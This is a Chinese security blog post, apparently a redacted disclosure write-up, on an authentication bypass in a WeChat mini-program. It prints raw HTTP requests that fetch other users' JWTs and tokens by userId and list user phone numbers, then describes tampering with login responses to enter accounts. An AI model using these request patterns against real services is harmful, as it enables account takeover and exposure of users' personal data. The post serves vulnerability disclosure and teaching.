记一次权限认证绕过

admin 2025年1月9日09:39:39评论6 views字数 1861阅读6分12秒阅读模式

 

该漏洞已经向相关单位与平台进行报告,本文中图片、内容等均已脱敏!!!

微信搜索小程序xxx

记一次权限认证绕过

搜索网站

http://xxxx.xxxx.com/login?backUrl=http://cloud.xxxx.com
记一次权限认证绕过

注册/微信授权登录进入

记一次权限认证绕过

小程序授权登录抓包获取userid

记一次权限认证绕过

调用请求payload

POST /imnet/api/getJwtTokenAndToken h2
host: xcxapi.xxxx.com
content-length: 14
reqable-id: reqable-id-6245450e-dfed-4467-9111-adf9aeb6ebc6
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090c11)XWEB/11581
accept: application/json
accept-encoding: gzip, deflate, br
content-type: application/x-www-form-urlencoded
cookie: JSESSIONID=A013BBDC80F295FFEACBEC6434ADC3C1
x-requested-with: XMLHttpRequest
token:xxxxxxxxxx
origin: https://xcxapi.xxxx.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://xcxapi.xxxx.com/appPreEntry?token=xxxxxxxxxxxxxxxxxxx&userId=xxxxxxx&procedureLetter=WEIXIN&version=1.0
accept-language: zh-CN,zh;q=0.9

userId=xxxxxxx

即可获取其他用户的jwt令牌与token

记一次权限认证绕过

调用pyaload

GET /restaurant/wqbUser/pageList h2
host: xcxapi.xxxx.com
reqable-id: reqable-id-607c2d5e-d427-47cc-b67f-ac10c97fab3a
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 MicroMessenger/7.0.20.xxxx(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090c11)XWEB/11581
accept: */*
accept-encoding: gzip, deflate, br
cookie: xxxxxxxxxxxxxxxxxxxxxxxxx
xweb_xhr: 1
token: E94F04932366FC3756B2319AB312134C 上个payload获取的token放在这里
content-type: application/json
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://xxxxxxxxxxxx.com/wx95aa572faff6320a/102/page-frame.html
accept-language: zh-CN,zh;q=0.9

调用pyaload获取用户信息和手机号

记一次权限认证绕过

登录后的网站后面有jwt令牌,修改jwt令牌并进行抓包

记一次权限认证绕过

将请求包钟的phone改为改jwt令牌相同token下获取的手机号

记一次权限认证绕过

相应包为true即可放包

记一次权限认证绕过

成功登录用户系统主页

选择一个系统进入并进行抓包

记一次权限认证绕过

此处手机号依旧改为之前的手机号

记一次权限认证绕过

即可进入系统,其他官方系统也是一样的操作方式

原文始发于微信公众号(隼目安全):【相关分享】记一次权限认证绕过

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月9日09:39:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次权限认证绕过https://cn-sec.com/archives/3608116.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息